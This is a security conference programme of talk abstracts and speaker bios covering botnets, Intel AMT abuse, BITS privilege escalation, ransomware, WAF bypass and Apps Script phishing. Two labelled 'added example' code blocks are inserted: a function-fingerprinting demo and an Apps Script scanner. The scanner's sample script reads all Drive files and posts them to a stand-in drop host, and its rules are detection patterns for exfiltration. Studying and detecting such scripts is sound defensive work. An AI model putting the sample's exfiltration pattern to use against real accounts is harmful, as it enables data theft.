Pakistan, which was once at the top of the list at Global Terror Index as almost all its cities were struck by terrorism resulting in massive casualties and damage to infrastructure, has re-emerged as a developing country due to effective risk mitigation strategy and continued momentum.
The Presenter will give an analysis of terrorism in Pakistan and the strategy adopted in Pakistan for countering terrorism.

Captain Kaleem Ahmad is a multiple award winning security professional and international speaker on security, with twenty five years of experience in military and Oil & Gas Security in high risk areas. He effectively deployed security echelons to counter threat to critical infrastructure.  He was awarded the ASIS “Timothy J.Walsh Award” for the year 2012 APC-1, USA, and the “Performance Excellence Award” by Pakistan Petroleum Limited.

Uncovering And Visualizing Botnet Infrastructure And Behavior

Josh Pyorre & Andrea Scarfo (OpenDNS/Cisco)

How much information about a botnet can one find using a single IP address, domain name or indicator of compromise (IOC)?
What kind of behavior can be determined when looking at attacker and victim infrastructure?

In an attempt to discover and analyze the infrastructure behind large-scale malware activity, we began our research with known indicators from popular botnets, such as Necurs.

Our presentation will highlight co-occurring malicious activities observed on the infrastructure of popular botnets.
We will demonstrate practical techniques for analyzing botnet and malware traffic to provide context that can be used in identifying actor and victim infrastructure and to discover additional IOCs.
We will also show how political and societal world events may influence specific types of malware activity based on locations and times of malware events.
Finally, we will demonstrate a visualization framework that can be used to better understand the connections between infrastructure, threats, victims, and malicious actors.

Josh and Andrea are Security Researchers with Cisco Umbrella (formerly OpenDNS).

Andrea began her career in Support and worked as a Sysadmin for 12 years. She has worked with Hewlett Packard and the Town of Danville, California. Security has always been her passion. She began working with OpenDNS as a Security Researcher on the Security Research team in 2015 and spends her days working to make the Internet a safer place by hunting attackers and malware. She presented at BSides Las Vegas in 2016.

Josh has worked in security for around 14 years. He's been a threat analyst at NASA, where he was part of the team that built the NASA Security Operations Center. He also helped to build the SOC at Mandiant. His professional interests involve network, computer and data security with a goal of maintaining and improving the security of as many systems and networks as possible. Josh has presented at DEF CON, BSides Austin, Chicago, San Francisco, Los Angeles and Vienna, Source Boston, Source Seattle, Derbycon, InfoSecurity World, DeepSec Vienna and Qbit Prague. He hosted season 1 of rootaccesspodcast.com.

Intel AMT: Using & Abusing The Ghost In The Machine

Parth Shukla (Google)

Come see how Intel AMT can be used to completely own a modern machine permanently and without detection.

In the first half of the talk, we’ll see how an attacker can abuse the legitimate functionalities of Intel AMT to gain long term persistent access with little to no chance of detection. The demoed attack can be executed to take ownership of AMT in less than 60 seconds - either through supply chain or temporary physical access. We will then show how AMT can be used for persistent access to the machine via readily available and easy-to-use C&C tools. Finally, we will cover possible mitigations and preventions against such attacks.

In the second half of the talk, we will walk through the process of doing non-destructive forensics on an Intel AMT to which we don’t know the admin password (i.e. potentially attacker controlled!). We will also describe how to reclaim ownership of the AMT once forensics is complete. Finally, we will be releasing the Linux tooling we developed in order to facilitate AMT forensics.

What is Intel AMT?

Intel AMT is an out-of-band, always-on management technology, embedded into Intel chipsets supporting vPro technology, intended to allow remote management of equipment without the need for a functioning OS. Intel AMT is commonly available on all Intel-based business laptops & desktops as well as many high end consumer laptops & desktops.

Parth Shukla is a Security Engineer and member of Google's Infrastructure Protection team. He works on efforts related to improving firmware integrity, verification and transparency.

Prior to Google, Parth was an Information Security Analyst at the Australian Computer Emergency Response Team (AusCERT). While at AusCERT, Parth analysed the non-public data of the Carna Botnet that he obtained exclusively from the anonymous researcher of Internet Census 2012. Parth released a white paper on this analysis (bit.ly/carna-paper) and presented on it at various conferences, including: DeepSec 2013 in Vienna, Austria; Blackhat Sao Paulo 2013 in Sao Paulo, Brazil; APNIC 36 in Xi’an, China and AusCERT 2013 in Gold Coast, Australia.

Normal Permissions In Android: An Audiovisual Deception

Constantinos Patsakis (University of Piraeus)

Marshmallow was a significant revision for Android as, among the many new features that were introduced, one of the most significant is without any doubt the runtime permissions. The permission model was totally redesigned, categorising the permissions into four main categories. The main concept in this categorisation is how much risk a user is exposed to when they are granted. Normal permissions imply the least risk for the user. However, there are some important issues in this case. Firstly, these permissions are not actually displayed to the user; they are not displayed upon installation and the user needs to dig into several menus to find them for each app. Most importantly though, these permissions cannot be revoked. Unlike dangerous permissions, where the user can grant or revoke a permission whenever deemed necessary, the normal permissions are automatically granted and cannot be revoked, unless the user uninstalls the app that uses them. The research question that arises from this change is whether the apps that request only normal permissions are benign. Note that an app requesting only normal permissions will never request any alerting action from the user, hence the user is more likely to install it and not worry about it. Furthermore, since these permissions are automatically granted, this means that any malicious action that could be made with such permissions can be ported to any installed app as they will not require any user interaction.

Our extensive experiments have shown that apps based only on the normal permissions are far from being considered benign as they can exploit many native Android mechanisms to perform many malicious actions. More precisely, we present many methods which exploit the capabilities of the user interface, voice assistants and intents in Android that lead to serious security issues. An overview of where these actions can be applied will be illustrated, indicating where Nougat is still vulnerable. The attacks which will be presented have already been disclosed to Google and Microsoft, and in some of these cases the appropriate patches have been made.

Assistant Professor Constantinos Patsakis (male) holds a B.Sc. in Mathematics from the University of Athens, Greece and a M.Sc. in Information Security from Royal Holloway, University of London. He obtained his PhD in Cryptography and Malware from the Department of Informatics of University of Piraeus. His main areas of research include cryptography, security, privacy, data anonymization and malware analysis.
He is the author of more than 70 publications in peer reviewed international conference proceedings and journals and has been teaching computer science courses at European universities for more than a decade. Dr Patsakis has been working in the industry as a freelance developer and security consultant. He has participated in several national (Greek, Spanish, Catalan and Irish) and European R&D projects. Additionally, he has worked as researcher at the UNESCO Chair in Data Privacy at the Rovira i Virgili University (URV) of Tarragona, Catalonia, Spain and as a research fellow at Trinity College, Dublin Ireland.

Out-of-Order Execution as a Cross-VM Side Channel and Other Applications

Sophia d’Antoine, Jeremy Blackthorne, Bülent Yener (Trail of Bits, Rensselaer Polytechnic Institute)

Given the rise in popularity of cloud computing and platform-as-a-service, vulnerabilities inherent to systems which share hardware resources will become increasingly attractive targets to malicious software authors.
In this paper, we introduce a novel side channel across virtual machines through the detection of out-of-order execution. We create a simple duplex channel as well as a broadcast channel. We discuss possible adversaries for this channel and propose further work to make this channel more secure, efficient and applicable in realistic scenarios. In addition, we consider seven possible malicious applications of this channel: theft of encryption keys, program identification, environmental keying, malicious triggers, denial of service attacks, determining VM co-location, malicious data injection, and side channels.

T.B.A.

Hacking The Brain For Fun And Profit

Stefan Hager (DATEV eG)

When we're talking and thinking about security, we very often have a rather fixed mindset and keep using what we think are proven methods. We tend not to question our decisions and thoughts, and the way our brains work reaffirms our bias and our mediocre choices. In this talk we take a closer look at how we are thinking, and how we can change or expand this as well as our perception, by hacking into our own brains in order to get a clearer picture of what we really want and need. New ways of thinking and creativity can be a vital new asset for blue and red teams.

Stefan is a member of the Internet Security team at the software company DATEV eG. After starting out as a programmer in the nineties he switched to cybersecurity shortly afterwards. Since 2000 he has been securing networks and computers for various enterprises in Germany and Scotland. His main focus nowadays is threat research, raising security awareness and discussing new ideas concerning threat mitigation. When not trying to do any of the stuff mentioned above, he is either travelling, fiddling around with hardware or trying to beat some hacking challenge. Stefan also writes blog posts (in English and German) on his site cyberstuff.org.

Forensic Accounting – The What, Why And How

Ulrike Hugl (University of Innsbruck)

As of late, Forensic Accounting seems to be the fastest growing area of accounting. The Association of Certified Fraud Examiners (ACFE) - the world’s largest anti-fraud organization - states that “Forensic Accountants combine their accounting knowledge with investigative skills in various litigation support and investigative accounting settings”; or more detailed: they are performing forensic research to trace funds and identify assets for recovery, conducting forensic analysis of financial data, and preparing forensic accounting reports from financial findings and analytical data for litigation. All in all, they are forced to grasp the substance of situations and look beyond the numbers. (http://www.acfe.com) In the Guide to Forensic Accounting Investigations (edited by Golden et al., 2011), Skalak et al. state that an audit responds to the risk of fraud, while forensic accounting investigation responds to allegation, suspicions, or evidence of fraud. The latter is examined by various current studies.
This contribution gives an overview of “What” is forensic accounting, “Why” it is needed, “What” techniques and practices exist and skills of accountants are important, as well as “How” it works (forensic data analysis) and may benefit business. Furthermore, ways of prevention, risk factors, indicators for internal offenders as well as starting points for trends and future research will be presented.

University of Innsbruck, Dr. Ulrike Hugl
Prof. Ulrike Hugl is a senior scientist and lecturer at the University of Innsbruck (School of Management), Department of Accounting, Auditing and Taxation. She is a member of various scientific committees of international conferences and a reviewer of several journals. Her research mainly focuses on new technologies with impacts on information security and data protection of organizations, as well as on occupational/corporate crime (especially insider threat) and industrial espionage issues.

On The (In-)Security Of JavaScript Object Signing and Encryption

Dennis Detering, Juraj Somorovsky, Christian Mainka, Vladislav Mladenov, Jörg Schwenk (Horst Görtz Institute for IT Security, Chair for Network and Data Security, Ruhr-University Bochum)

JavaScript Object Notation (JSON) has evolved to the de-facto standard file format in the web used for application configuration, cross- and same-origin data exchange, as well as in Single Sign-On (SSO) protocols such as OpenID Connect. To protect integrity, authenticity and confidentiality of sensitive data, JavaScript Object Signing and Encryption (JOSE) was created to apply cryptographic mechanisms directly in JSON messages.
We investigate the security of JOSE and present different applicable attacks on several popular libraries. We introduce JOSEPH (JavaScript Object Signing and Encryption Pentesting Helper) – our newly developed Burp Suite extension, which automatically performs security analysis on targeted applications. JOSEPH’s automatic vulnerability detection ranges from executing simple signature exclusion or signature faking techniques, which neglect JSON message integrity, up to highly complex cryptographic Bleichenbacher attacks breaking the confidentiality of encrypted JSON messages. We found severe vulnerabilities in six popular JOSE libraries. We responsibly disclosed all weaknesses to the developers and helped them to provide fixes.

T.B.A.

Making Security Awareness Measurable

Stefan Schumacher (Magdeburger Institut für Sicherheitsforschung)

Security awareness campaigns aim at educating and training your workforce with regards to IT security. Those trainings take time and can be rather complex - which makes them also expensive. However, we still lack the scientific base of how to design a successful security awareness campaign and how to evaluate its success, especially when it comes to elaborate social engineering attacks. In this talk I will introduce scientifically sound methods and tools from industrial and organisational psychology and industrial education to measure the success of security awareness campaigns. I will show human factors that enable or limit the success of training campaigns and how to enhance future campaigns based on lessons learned from former campaigns. All while keeping in mind that humans are not the weakest link in a security system, but the only defensive measure we have.

Stefan Schumacher is the president of the Magdeburg Institute for Security Research and editor of the Magdeburg Journal for Security Research in Magdeburg/Germany. He started his hacking career before the fall of the Berlin Wall, on a small East German computer with 1.75 MHz and a Datasette drive. Ever since he liked to explore technical and social systems, with a focus on security and how to exploit them. He was a NetBSD developer for some years and involved in several other Open Source projects and events. He studied Educational Science and Psychology, has done a lot of unique research about the Psychology of Security with a focus on Social Engineering, User Training and Didactics of Security/Cryptography. Currently he's leading the research project Psychology of Security, focusing on fundamental qualitative and quantitative research about the perception and construction of security.
He presents the results of his research regularly at international conferences like AusCert Australia, Chaos Communication Congress, Chaos Communication Camp, DeepSec, DeepIntel, Positive Hack Days Moscow or LinuxDays Luxembourg and in security related journals and books.

I Wrote my Own Ransomware; Did Not Make 1 Iota Of A Bitcoin

Thomas Fischer (Digital Guardian)

2016 saw a substantial rise in ransomware attacks and in some cases the return of some favourites, with Cryptowall, CTB-LOCKER and TeslaCrypt being some of the most popular. The volume of attacks was in fact pretty steady for a good part of the year, with regular campaigns coming out on a weekly basis. It was interesting to see the variety in mechanisms used for the ransomware, which not only included self-contained binaries but went all the way to the use of scripts. As part of the research I conducted last year, I wanted to understand why there's such a drive and lure for ransomware, outside of the victims' payment, as well as have some way of properly testing "anti-ransomware" solutions with an unknown variant. So to do that, I went ahead and built my own ransomware and drew some conclusions on why it became so popular. This talk explores the background and process used to build a live ransomware that I was able to use for controlled testing, and finally draws some of my own personal conclusions.

With over 25 years of experience, Thomas has a unique view on security in the enterprise with experience in multiple domains from risk management and secure development to incident response and forensics. In his career, he's held varying roles from incident responder to security architect for Fortune 500 companies as well as industry vendors and consulting organizations. Currently he plays a lead role in advising customers while investigating malicious activity and analyzing threats for Digital Guardian. He's also a strong advocate of knowledge sharing and mentoring through being an active participant in the infosec community, not only as a member but also as director of Security BSides London and as an ISSA UK chapter board member.

Enhancing Control Flow Graph Based Binary Function Identification

Clemens Jonischkeit, Julian Kirsch (Technical University of Munich)

Detection of binary functions in compiled code is a major stepping stone towards any advanced binary analysis technique. Nucleus [1] is a novel algorithm based on the idea of using the interprocedural control flow graph to detect function boundaries. Building upon this technology we propose a new approach to solve the related problem of identifying previously-seen known functions within a binary.
Our idea is based on comparing the control flow graphs (CFGs) of unknown functions from a binary to known functions from a previously generated database. Compared to traditional approaches, our method is aware of the underlying graph matching problem being performed on CFGs of binary code: First, it utilizes instruction level knowledge about basic blocks as additional constraints for graph isomorphism. Second, optimizations and transformations introduced by different compilers affecting the shape of the CFG are taken into account.
Our approach aims to avoid false positives (wrongly assigning a known function symbol to an unknown function) at all cost: The evaluation shows that this method is very effective in reducing false positive matches (below one percent in most cases) maintaining recall rates as high as 72.8% when matching functions across two different nginx versions (1.12.1 and 1.10.3).
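An added example of the matching idea described above (block-level instruction constraints on top of CFG shape, and refusing to label a function rather than risk a false positive); it is not the authors' Nucleus-based tooling. It fingerprints a CFG by Weisfeiler-Lehman style relabelling, where each block's label is its mnemonic sequence (operands dropped, alignment padding ignored) folded with the sorted labels of its successors, so block numbering, register allocation and `nop` padding do not matter but the graph shape and per-block instruction mix do. The sample CFGs, the filler list and the block-id convention (entry is block 0) are constructed assumptions for the demo.

```python
"""Added example: CFG fingerprints with block-level instruction constraints,
used to label unknown functions from a database while refusing ambiguous
matches. Not the authors' Nucleus-based code."""
import hashlib
from typing import Dict, List, Tuple

# A CFG is {block_id: (instructions, successor_block_ids)}; block 0 is the entry.
CFG = Dict[int, Tuple[List[str], List[int]]]

# Padding a compiler may insert without changing semantics (assumed list).
FILLER = {"nop", "endbr64", "endbr32"}


def block_label(instructions: List[str]) -> str:
    """Instruction-level constraint: mnemonics only, since registers, immediates
    and addresses change between compilers and versions."""
    mnemonics = []
    for ins in instructions:
        parts = ins.split()
        if parts and parts[0].lower() not in FILLER:
            mnemonics.append(parts[0].lower())
    return hashlib.sha256(" ".join(mnemonics).encode()).hexdigest()[:16]


def cfg_fingerprint(cfg: CFG, rounds: int = 3) -> str:
    """Fold each block's label with the sorted labels of its successors for a few
    rounds, then hash the sorted multiset of final labels."""
    labels = {b: block_label(ins) for b, (ins, _) in cfg.items()}
    labels[0] = "entry:" + labels[0]          # the entry block is distinguished
    for _ in range(rounds):
        labels = {
            b: hashlib.sha256(
                (labels[b] + "->" + ",".join(sorted(labels[s] for s in succ))).encode()
            ).hexdigest()[:16]
            for b, (_, succ) in cfg.items()
        }
    return hashlib.sha256("|".join(sorted(labels.values())).encode()).hexdigest()


def build_database(known: Dict[str, CFG]) -> Dict[str, List[str]]:
    db: Dict[str, List[str]] = {}
    for name, cfg in known.items():
        db.setdefault(cfg_fingerprint(cfg), []).append(name)
    return db


def identify(unknown: Dict[str, CFG], db: Dict[str, List[str]]) -> Dict[str, str]:
    """Precision over recall: label a function only when its fingerprint maps to
    exactly one known symbol; unknown or ambiguous shapes stay unlabelled."""
    result = {}
    for uid, cfg in unknown.items():
        names = db.get(cfg_fingerprint(cfg), [])
        if len(names) == 1:
            result[uid] = names[0]
    return result


# Constructed sample CFGs: one byte-sum loop as two different builds (register
# allocation, block numbering and padding differ), plus distractors.
CHECKSUM_BUILD_A: CFG = {
    0: (["xor eax, eax", "test rsi, rsi", "je 3"], [1, 3]),
    1: (["movzx edx, byte [rdi]", "add eax, edx", "inc rdi", "dec rsi", "jne 1"], [1, 2]),
    2: (["ret"], []),
    3: (["ret"], []),
}
CHECKSUM_BUILD_B: CFG = {
    0: (["endbr64", "xor ecx, ecx", "test rdx, rdx", "je 2"], [3, 2]),
    3: (["movzx r8d, byte [rdi]", "add ecx, r8d", "inc rdi", "dec rdx", "jne 3", "nop"], [3, 1]),
    1: (["ret"], []),
    2: (["ret"], []),
}
STRLEN_LIKE: CFG = {
    0: (["xor eax, eax", "jmp 1"], [1]),
    1: (["cmp byte [rdi+rax], 0", "je 3"], [2, 3]),
    2: (["inc rax", "jmp 1"], [1]),
    3: (["ret"], []),
}
GETTER_A: CFG = {0: (["mov eax, [rip+0x2000]", "ret"], [])}
GETTER_B: CFG = {0: (["mov eax, [rip+0x2010]", "ret"], [])}
UNRELATED: CFG = {0: (["push rbp", "mov rbp, rsp", "call 0x401200", "pop rbp", "ret"], [])}

KNOWN = {"checksum": CHECKSUM_BUILD_A, "strlen_like": STRLEN_LIKE,
         "get_a": GETTER_A, "get_b": GETTER_B}

if __name__ == "__main__":
    db = build_database(KNOWN)
    print(identify({"sub_401000": CHECKSUM_BUILD_B, "sub_401040": GETTER_A,
                    "sub_401080": UNRELATED}, db))
```

Equal fingerprints are a necessary condition, not a proof of isomorphism; a production matcher would confirm a candidate with an explicit constrained graph-isomorphism check before assigning the symbol, which is the step the abstract's false-positive figures depend on.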

T.B.A.

Cloud Of Suspicion: Scaling Up Phishing Campaigns Using Google Apps Scripts

Maor Bin (Proofpoint)

Google Apps Script is a JavaScript cloud scripting language that provides easy ways to automate tasks across Google products and third party services and build web applications. However, it also provides relatively easy ways for attackers to automate infiltration, propagation, exfiltration and maintaining access to a compromised G Suite powered organization. While the platform has been used successfully for C&C (Carbanak) previously, we feel it only scratched the surface as potential vectors go.


In this talk we'll present original and innovative methods of launching classical attacks using Google Scripts as well as possible ways of detecting and preventing those attacks.

Presentation Outline

1. Scripts intro & background.
- Types of scripts
- Capabilities & limitations 

2. Infiltration examples
- Standalone/URL — direct script sent to a victim, using the Google domain as the trust vehicle
- Bounded scripts — scripts can be embedded to documents, much like Office Macros, having similar capabilities,

3. Exfiltration / Communication Examples
- Auto forward emails — bypass Google forward limitation, forward users email to us, remove traces of sent email
- Post to external URL — post selected files contents via encoded headers to a remote drop location of our choice
- Google scripts as C&C — (Carbanak discussion?)

** DEMO ** Use Google apps script as a self executing javascript inside a Google Doc and send it to multiple users as a phishing campaign.

4. Propagation - “Google Docs” worm discussion. Creating “Google Docs” worm with Google Apps Scripts

5. Detecting and preventing malicious scripts
- Whitelist / Blacklist, permission based, pre-defined
- Scripts Static Analysis, enumeration based on scripts contents

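One way to do the "static analysis, enumeration based on script contents" step of item 5 in the outline, as an added example that is not Proofpoint's product code: a scanner that flags Apps Script service calls giving a script mailbox or Drive read access, an outbound channel, persistence or propagation, and scores the combination so that read access plus egress (the exfiltration shape from item 3) is weighted up. The service and method names come from the public Apps Script reference; the categories, weights, threshold and both sample scripts are this example's own constructed choices.

```python
"""Added example: static triage of Google Apps Script source by service call.
Heuristic categories/weights are constructed for the demo, not a vendor's rules."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# (pattern, category, weight). Longer alternatives are listed first so a match
# does not stop at a shorter prefix.
RULES = [
    (r"\bUrlFetchApp\.fetch(?:All)?\s*\(", "egress", 3),
    (r"\bGmail\.Users\.Settings\.(?:ForwardingAddresses|Filters)\.create\s*\(", "mail_forward", 4),
    (r"\bGmailApp\.(?:getInboxThreads|getMessagesForThreads|search)\s*\(", "mail_read", 2),
    (r"\bDriveApp\.(?:getFilesByType|searchFiles|getFiles|getRootFolder)\s*\(", "drive_read", 2),
    (r"\b(?:MailApp|GmailApp)\.sendEmail\s*\(", "mail_send", 2),
    (r"\bScriptApp\.newTrigger\s*\(", "persistence", 2),
    (r"\.(?:addEditors?|makeCopy)\s*\(", "propagation", 3),
]


@dataclass
class Finding:
    line: int
    category: str
    snippet: str
    weight: int


def scan_script(source: str) -> List[Finding]:
    findings = []
    for lineno, text in enumerate(source.splitlines(), start=1):
        code = text.split("//", 1)[0]   # naive line-comment strip; '//' inside a string also cuts
        for pattern, category, weight in RULES:
            if re.search(pattern, code):
                findings.append(Finding(lineno, category, text.strip(), weight))
    return findings


def risk_score(findings: List[Finding]) -> int:
    score = sum(f.weight for f in findings)
    categories = {f.category for f in findings}
    # Data access plus an outbound channel is the exfiltration shape: weight it extra.
    if categories & {"mail_read", "drive_read"} and "egress" in categories:
        score += 5
    return score


def verdict(source: str, threshold: int = 6) -> Tuple[str, List[Finding]]:
    findings = scan_script(source)
    return ("block" if risk_score(findings) >= threshold else "allow"), findings


# Constructed samples, not scripts observed in the wild.
MALICIOUS_SAMPLE = """\
function onOpen() {
  ScriptApp.newTrigger('harvest').timeBased().everyMinutes(5).create();
}
function harvest() {
  var files = DriveApp.getFiles();
  while (files.hasNext()) {
    var body = Utilities.base64Encode(files.next().getBlob().getBytes());
    UrlFetchApp.fetch('https://drop.example.invalid/in', {headers: {'X-Data': body}});
  }
}
"""
BENIGN_SAMPLE = """\
function onEdit(e) {
  e.range.setBackground('#ffff00'); // highlight edited cells
}
"""

if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        decision, found = verdict(src)
        print(name, decision, [(f.line, f.category) for f in found])
```

A scanner like this belongs next to, not instead of, the allowlist approach from the same outline item: it only sees the source of scripts an organisation can enumerate, and an obfuscated script can hide service names behind string building until runtime.
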
Maor works as a research lead at Proofpoint, as part of the SaaS Protection product, researching customers' data in order to identify risks and threats in their cloud environment, as well as new and innovative attack vectors, so that they can be blocked when they become active. Before that he worked as a mobile researcher and reverse engineer for several years.

BITSInject - Control Your BITS, Get SYSTEM

Dor Azouri (Security researcher @SafeBreach)

Windows’ BITS service is a middleman for your download jobs. You start a BITS job, and from that point on, BITS is responsible for the download. But what if we tell you that BITS is a careless middleman?

We have uncovered the way BITS maintains its jobs queue using a state file on disk, and found a way for a local administrator to control jobs using special modifications to that file.
Comprehending this file’s binary structure allowed us to change a job’s properties (such as RemoteURL, Destination Path...) at runtime and even inject our own custom job, using none of BITS’ public interfaces. This method, combined with the generous notification feature of BITS, allowed us to run a program of our will as the LocalSystem account, within session 0.

So if you wish to execute your code as NT AUTHORITY\SYSTEM and the first options that come to mind are psexec/creating a service, we now add a new option: BITSInject.
Here, we will not only introduce the practical method we formed, but also: Reveal the binary structure of the state file for you to play with, and some knowledge we gathered while researching the service flow;
We will also provide free giveaways: A one-click python tool that performs the described method; SimpleBITSServer - a pythonic BITS server; A struct definition file, to use for parsing your BITS state file.

Dor is a security professional with 6+ years of unique experience in network security, malware research and infosec data analysis. Currently he's doing security research @SafeBreach.

How Secure Are Your VoLTE And VoWiFi Calls?

Sreepriya Chalakkal (ERNW GmbH)

Voice over LTE (VoLTE) as well as Voice over WiFi (VoWiFi) are variants of Voice over IP that make use of the IP Multimedia Subsystem (IMS) in their backend. In this talk, we identify five different attacks on VoLTE/VoWiFi.


This includes mainly (i) sniffing VoLTE/VoWiFi interfaces, (ii) extracting IPSec keys from the IP Multimedia Services Identity Module (ISIM) that is embedded within the SIM card, and (iii) performing three different kinds of injection attacks in the Session Initiation Protocol (SIP) headers that are used for signaling of VoLTE/VoWiFi. As a result of VoLTE/VoWiFi sniffing, we identified information disclosures such as leaking IMSI, IMEI, location of users and the private IP of the IMS.

We also managed to extract the ciphering key and the integrity key (CK/IK) used for IPSec from ISIM with the help of a hardware device called SIMTrace.
We also discuss three different SIP header injection attacks that enable location manipulation and side channel attacks.


It is important to note here that all these attacks are valid on the current 3GPP standards that are used by telecom providers. Thus understanding the attacks and mitigating them is of high relevance.

This is a continuation of the work presented by Schmidt et al. in the talk IMSecure – Attacking VoLTE at the Area41 conference, 2016.

Sreepriya works at ERNW GmbH as a security researcher focused on Telecommunication security.  She completed her masters from Technical University of Berlin and University of Trento with a dual degree in Computer Security and Privacy in March 2017.
She is passionate about the security aspects of software and protocols. These days, she spends her time playing with telecommunication devices and SIM cards. Sreepriya likes to do security analysis of large code bases, packet captures and logs. She's inspired by the mission "Making the world a safer place" and loves to work towards fulfilling that goal.

Essential Infrastructure Interdependencies: Would We Be Prepared For Significant Interruptions?

Herbert Saurugg (Cyber Security Austria)

Cyber Security and Critical Infrastructure Protection (CIP) are major topics almost everywhere. Their priority has also increased during recent years because of rising incidents, even if the focus is still on a sectoral approach and on prevention. And there's the issue of delayed detection. How to cope with significant infrastructure interruptions if protection efforts fail and possible cascading effects occur is hardly public knowledge, nor do people have the necessary capabilities to deal with them. The shared belief that it won’t happen is still overwhelming. But it could be a Turkey Illusion.
DDoS, IoT-attacks, ransomware, vulnerabilities, unpatchable IT-systems, ... the list of current IT-problems and challenges is endless. Every security expert is daily fighting an unwinnable battle. But what would it mean to our society, if infrastructure systems fail on a broad scale? How can we reduce these risks? And how can we make infrastructures more robust and people resilient?
This talk will look at cyber security from a different perspective and open your eyes to a hardly recognised danger to our modern and heavily interconnected world.

Herbert Saurugg was a career officer in the ICT-Security Section of the Austrian Armed Forces until 2012. Since then he has been on leave and is engaged in raising awareness about the increasing systemic risks due to the rising interconnections and dependencies between many Critical Infrastructures, which is contributing to extreme events. He is known as an expert on the topic of blackouts: a Europe-wide power-cut and infrastructure collapse. He is also a founding member of the association Cyber Security Austria, which is the mastermind behind the European Cyber Security Challenge. As a result of his systemic reflections he is calling for more efforts to raise awareness and resilience throughout our societies to face major extreme events in the foreseeable future.

BitCracker: BitLocker Meets GPUs

Elena Agostini (National Research Council of Italy)

BitLocker is a full-disk encryption feature available in recent Windows versions. It is designed to protect data by providing encryption for entire volumes and it makes use of a number of different authentication methods. In this work we present a solution, named BitCracker, to attempt the decryption, by means of a dictionary attack, of memory units encrypted by BitLocker with a user-supplied password. To that purpose, we resort to GPUs (Graphics Processing Units) that are, by now, widely used as general-purpose coprocessors in high performance computing applications.
The BitLocker decryption process requires the execution of a very large number of SHA-256 hashes and also AES, so we propose a very fast solution, highly tuned for Nvidia GPUs, for both of them. In addition, we take advantage of a weakness in the BitLocker decryption algorithm to speed up the execution of our attack.
We benchmark our solution using the three most recent Nvidia GPU architectures (Kepler, Maxwell and Pascal), carrying out a comparison with the Hashcat password cracker.
Finally, our OpenCL implementation of BitCracker has been recently released within John The Ripper, Bleeding-Jumbo version.

Elena Agostini received her PhD in Computer Science from the University of Rome “La Sapienza” in collaboration with the National Research Council of Italy. The main topics of her research are GPUs, used both for cryptanalysis and for communications, and wireless network protocols.

Bypassing Web Application Firewalls

Khalil Bijjou (EUROSEC GmbH)

This talk will teach you how to attack applications secured by a WAF. The presenter will describe the newest WAF bypassing techniques and provide a systematic and practical approach on how to bypass WAFs. WAFNinja, a tool that helps to find vulnerabilities in WAFs, will be introduced.

Khalil Bijjou is an enthusiastic ethical hacker, bug hunter and penetration tester for the German IT security consulting firm EUROSEC. He performs security assessments for major companies, especially in the field of web, mobile and SAP security. Khalil reached the 2nd place in the German Post IT Security Cup 2015 and was a speaker at PHDays, Moscow and DefCamp, Bucharest.

OpenDXL In Active Response Scenarios

Tarmo Randel (CCDCOE)

Automating response to cyber security incidents is the trend which is - considering the increasing number of incidents organizations handle and the ever-increasing attack surface - already becoming mainstream.

In this talk I explore the options for exploiting OpenDXL in the real-life situation of mixed environments, legacy solutions and multiple vendors, for connecting existing and future cyber security system components for coordinated information exchange and orchestrating incident response actions.

Tarmo is a researcher at the NATO Cooperative Cyber Defence Centre of Excellence, working on various research projects and developing for large-scale cyber exercises. He's also a developer at the Estonian eHealth Foundation, "kickstarting" the in-house development team: creating supporting infrastructure, preparing and executing plans for taking over selected external vendor development projects. Previously he was Head of Department at CERT-EE, running the Computer Emergency Response Team, and an information security expert at CERT-EE, creating new tools and implementing existing ones to understand what is going on in networks: detecting and mitigating cyberattacks, analysing malware, planning and executing public awareness raising campaigns and supporting the building of a trusted information security community network.

He has also been a system administrator at Tele2 & Trigger Software, converting legacy systems to modern, expandable high availability systems, coding in PHP and C, looking for and eliminating performance bottlenecks, and supporting development infrastructure.

How I Rob Banks

Freakyclown (Redacted Firm)

A light-hearted trip through security failures, both physical and electronic, that have enabled me over the years to circumvent the security of most of the world's largest banks. Through the use of tales from the front line and useful illustrative slides, I will attempt to take you through the lessons to be learned from an ethical hacker with a penchant for breaking into the impossible. Let me take you on a rollercoaster ride of epic fails and grandiose plans and my Jason Bourne-like adventures, including lockpicking, kidnap, police chases and multi-million pound bank heists.

FC is a well-known ethical hacker and social engineer. He has been working in the infosec field for over 20 years and excels at circumventing access controls. He has held positions in his career such as Senior Penetration Tester as well as Head of Social Engineering and Physical Assessments for renowned penetration testing companies. As the former Head of Cyber Research for Raytheon Missile Systems, and having worked closely alongside intelligence agencies, he has cemented both his skillset and knowledge as well as helped steer governments towards correct courses of action against national threats.
As an ethical hacker and social engineer, FC ‘breaks into’ hundreds of banks, offices and government facilities in the UK and Europe. His work demonstrating weaknesses in physical, personnel and digital controls assists organisations to improve their security. He is motivated by a drive to make individuals, organisations and countries more secure and better able to defend themselves from malicious attack.
Now Co-Founder and Head of Ethical Hacking at Redacted Firm, he continues to perform valuable research into vulnerabilities. His client list includes major high-street banks in the UK and Europe, FTSE100 companies and multiple government agencies and security forces. FC frequently gives talks at corporate events, security conferences, universities and schools and focuses on teaching people of all ages the art of security in an engaging and impactful way. He co-founded the Surrey and Hampshire Hackspace as well as Defcon 441452. He has co-hosted many podcasts, been featured in the press and regularly writes articles for journals and blogs.

Securing The Darknet

Jens Kubieziel (TorServers.net)

Tor's Onion Services are often labeled as "The Darknet": the place where people can do all sorts of things without the possibility of being discovered. In practice those services have quite a number of weaknesses, and people do actively exploit them. This talk will present some of those attacks and the countermeasures which are currently deployed.

Jens Kubieziel is a supporter of The Tor Project and helps to run several relays with TorServers.net. In his daytime job he helps to readjust the security assumptions of some companies.

A story of a vulnerability: How to execute code on a forensic workstation

Wolfgang Ettlinger (SEC Consult)

EnCase Forensic Imager is a tool used by forensic investigators to gather evidence from storage media. We used a custom tool to fuzz the file system parser code of this product and found a buffer overflow vulnerability in the LVM2 parser. We demonstrate the approach we used to fuzz EnCase Forensic Imager, describe the technical details of the vulnerability and show how this vulnerability can be exploited to execute arbitrary code on the investigator's machine. We wrap up our talk by discussing the impact of this vulnerability on forensic evidence.

Wolfgang Ettlinger has worked as a technical security consultant for SEC Consult for the past 4 years. He graduated with an MSc in Secure Information Systems from the University of Applied Sciences Upper Austria. He has an interest in many information security topics, ranging from binary exploitation to cryptography. In past years, Wolfgang Ettlinger has published several security advisories demonstrating vulnerabilities in multiple software products.

Building Security Teams

Astera Schneeweisz (SoundCloud)

